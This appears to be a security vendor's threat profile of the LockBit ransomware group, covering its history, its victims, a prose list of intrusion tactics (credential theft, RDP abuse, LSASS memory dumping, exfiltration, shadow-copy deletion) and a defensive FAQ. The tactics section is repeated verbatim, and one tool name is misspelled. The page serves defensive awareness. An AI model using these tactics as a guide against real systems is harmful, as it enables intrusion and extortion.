Lockbit
LockBit, also recognized as LockBit Black or Lockbit 3.0, is one of the largest Ransomware Groups in the world and has orchestrated extensive cyberattacks across various industries, impacting thousands of organizations globally with its relentless and adaptive strategies.

The Origin of Lockbit
LockBit traces its origins back to September 2019, when the first known activity of the “ABCD” ransomware—widely regarded as LockBit’s predecessor—was observed. By January 2020, LockBit had begun appearing under its current name on Russian-language cybercrime forums. From that initial foothold, it has rapidly become one of the most prominent ransomware families on the cybercriminal landscape, adopting a Ransomware-as-a-Service (RaaS) model that includes a dedicated leak site (DLS) and a ransom negotiation portal. Affiliates sign on to use LockBit’s ransomware builders, manage new victims via the DLS, and may also employ “StealBit,” an information-stealing tool built into later LockBit versions.
A significant milestone arrived in June 2021 with the debut of LockBit 2.0 (often referred to as LockBit Red). While LockBit’s popularity and impact were already growing, this release dramatically expanded the group’s visibility. In October 2021, LockBit Linux-ESXi Locker version 1.0 appeared, broadening LockBit’s targeting capabilities to Linux and VMware ESXi systems. The ransomware operators continued evolving their product in March 2022 with the emergence of LockBit 3.0, also called LockBit Black—a new variant sharing code similarities with BlackMatter and Alphv (BlackCat) ransomware. Although its first appearance was reported in March 2022, many point to June 2022 as a significant launch date when LockBit 3.0 became widely adopted. LockBit Red (the rebranded LockBit 2.0) remained the default builder for most affiliates, while LockBit Black was reserved for affiliates who had demanded over USD $2.5 million in ransoms. This version also introduced advanced functionality, such as killing specific processes or defining file and device allowlists, and included a bug bounty program offering rewards of up to USD $10 million.
In September 2022, a leak of the LockBit 3.0 builder enabled non-LockBit affiliates to generate LockBit payloads, accelerating its spread. The ransomware’s next iteration, LockBit Green, was unveiled in January 2023, reportedly incorporating leaked Conti version 3 source code. Unlike LockBit Black, LockBit Green required no proof of large ransom demands, making it a more inclusive offering for a broader array of cybercriminal operators. Four months later, in April 2023, a new LockBit macOS variant surfaced on open-source malware repositories, largely mirroring the functionality of LockBit’s Linux/ESXi version and underscoring the group’s continued push to infect as many platforms as possible.
Law enforcement pressure against LockBit intensified in February 2024 when “Operation Cronos”—a coordinated multinational effort—resulted in the temporary seizure of its DLS and affiliate portal. Although LockBit services were restored five days later, further action in May 2024 led to indictments and sanctions targeting several of the group’s key members, including a Russian national identified as a principal developer and administrator. In December 2024, LockBit countered these setbacks by releasing LockBit 4.0, which notably removed the option to generate LockBit Red payloads. Despite ongoing disruptions, LockBit has maintained its position as a formidable ransomware force by regularly updating its offerings and continuing to attract affiliates through its RaaS framework.
Sources: CISA & Crowdstrike

Countries targeted by Lockbit
Despite Lockbit's assertions of political neutrality, a substantial number of its victims seem to be from NATO member states and their allies.
Approximately 50% of the assaults involving the LockBit 3.0 strain have impacted businesses in the United States. Hackers using Lockbit received more than $91 million in ransom payments from U.S. victims.
Brazil and India are also highly targeted.

Industries Targeted by Lockbit
Manufacturing is frequently attacked by LockBit, yet no single industry is consistently singled out, underscoring the group's indiscriminate targeting.
While typically preying on small to medium-sized businesses, even large firms like IT giant Accenture are not immune to LockBit's reach.
Source: SOCRadar
Lockbit's Victims
Lockbit’s Attack Method

LockBit 3.0 participants access networks by:
- compromising existing account credentials
- utilizing RDP breaches
- exploiting vulnerabilities in public-facing systems
- navigating to malicious websites during normal browsing
- conducting phishing attacks

LockBit 3.0 seeks to gain higher access levels when current permissions are inadequate and uses auto login features to elevate privileges.

LockBit 3.0 conceals its activity by encrypting communications to control servers and self-deleting after execution, and will proceed with decryption only when the correct password is supplied.
To remain embedded within a network, LockBit 3.0 manipulates compromised user accounts and configures systems for automatic login.

LockBit 3.0 utilizes ProDump from Microsoft Sysinternals to extract process memory contents from LSASS.exe.

LockBit 3.0 scans networks using SoftPerfect Network Scanner, gathers detailed system and domain data, and avoids infecting systems with specific language settings.

For internal network penetration, LockBit 3.0 leverages Splashtop remote-desktop software.


LockBit 3.0 sets up command and control using FileZilla and automates secure shell interactions via Plink on Windows systems. During its operation, LockBit 3.0 executes commands and employs Chocolatey, a Windows package manager, for software management.

LockBit 3.0 employs its bespoke tool Stealbit and popular cloud services to siphon data from networks.

LockBit 3.0 disrupts operations by erasing logs, clearing the recycle bin, encrypting data, halting processes and services, deleting shadow copies, and altering the infected system's appearance with its own imagery.

LockBit 3.0 participants access networks by:
- compromising existing account credentials
- utilizing RDP breaches
- exploiting vulnerabilities in public-facing systems
- navigating to malicious websites during normal browsing
- conducting phishing attacks

LockBit 3.0 seeks to gain higher access levels when current permissions are inadequate and uses auto login features to elevate privileges.

LockBit 3.0 conceals its activity by encrypting communications to control servers and self-deleting after execution, and will proceed with decryption only when the correct password is supplied.
To remain embedded within a network, LockBit 3.0 manipulates compromised user accounts and configures systems for automatic login.

LockBit 3.0 utilizes ProDump from Microsoft Sysinternals to extract process memory contents from LSASS.exe.

LockBit 3.0 scans networks using SoftPerfect Network Scanner, gathers detailed system and domain data, and avoids infecting systems with specific language settings.

For internal network penetration, LockBit 3.0 leverages Splashtop remote-desktop software.


LockBit 3.0 sets up command and control using FileZilla and automates secure shell interactions via Plink on Windows systems. During its operation, LockBit 3.0 executes commands and employs Chocolatey, a Windows package manager, for software management.

LockBit 3.0 employs its bespoke tool Stealbit and popular cloud services to siphon data from networks.

LockBit 3.0 disrupts operations by erasing logs, clearing the recycle bin, encrypting data, halting processes and services, deleting shadow copies, and altering the infected system's appearance with its own imagery.
TTPs used by Lockbit
How to Detect Lockbit with Vectra AI
List of the Detections available in the Vectra AI Platform that would indicate a ransomware attack.
FAQs
What is LockBit ransomware?
LockBit is a Ransomware-as-a-Service (RaaS) that encrypts an organization's data and demands a ransom for the decryption key. It's known for its stealth, speed, and the use of a double extortion scheme.
How does LockBit gain initial access to networks?
LockBit often gains initial access through various means, including exploiting remote desktop protocols (RDP), phishing, spear-phishing, and using credentials from previously breached accounts.
What makes LockBit 3.0 different from its previous versions?
LockBit 3.0 is more modular and evasive, with improved encryption and the ability to customize the attack payload. It has incorporated features from other ransomware like BlackMatter and BlackCat.
Has LockBit been involved in any significant cyber incidents?
Yes, LockBit has been responsible for numerous attacks on businesses globally, including high-profile incidents involving large multinational corporations.
What sectors does LockBit typically target?
LockBit does not target a specific sector. It has been known to target a wide range of industries, including healthcare, education, and manufacturing.
How does LockBit handle the ransom process?
LockBit typically leaves a ransom note with payment instructions within the compromised system. Payment is usually demanded in cryptocurrency, and negotiations are sometimes conducted on the dark web.
What defensive measures can be effective against LockBit?
Regularly updating and patching systems, implementing robust access controls, conducting frequent security awareness training, using advanced threat detection tools, and maintaining offline backups are critical defenses.
Are there decryption tools available for LockBit encrypted files?
If you have been impacted by LockBit, the National Crime Agency (NCA) has acquired 1,000 decryption keys from LockBit's site that can assist in decrypting stolen data.
What is the best course of action if my network is compromised by LockBit?
Isolate the affected systems, initiate an incident response plan, and contact law enforcement and cybersecurity professionals. Avoid paying the ransom, as it does not guarantee data recovery and may fund further criminal activity.
What is known about the operators behind LockBit?
The operators are believed to be a part of a sophisticated cybercriminal group that operates with a RaaS model, recruiting affiliates to spread the ransomware while remaining hidden and maintaining anonymity.